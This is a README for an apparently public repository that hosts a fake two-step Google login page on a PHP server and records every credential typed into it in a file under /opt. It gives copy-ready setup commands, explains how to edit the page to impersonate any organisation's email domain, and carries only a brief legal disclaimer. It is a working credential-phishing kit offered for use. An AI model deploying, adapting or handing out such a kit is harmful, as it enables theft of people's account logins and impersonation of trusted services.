This repo contains a fake two-part Google Login. It can be used on a web server that supports PHP files. Any entered credentials are saved in /opt/GooglePhishing/creds.txt. The Domain Suffix can be changed from @client.com to any site of your choosing (to do this, just edit line 21 of index.html). Follow steps below for a quick and easy setup.
Legal Disclaimer: Usage of this repo for attacking targets without prior consent is illegal. It is the end user's responsiblity to obey applicable local, state and federal laws. Developer assumes no liability for any misuse or damage caused by this repo.
Run the below commands in the /var/www/html folder of your web server.
git clone https://github.com/jakedmurphy1/GooglePhishing.git
cd GooglePhishing
chmod 666 creds.txt
Move the credentials file into a non-public folder:
mkdir /opt/GooglePhishing && mv creds.txt /opt/GooglePhishing/creds.txt
Then visit /GooglePhishing/index.html in your browser and give it a try! Any gathered credentials will be stored in /opt/GooglePhishing/creds.txt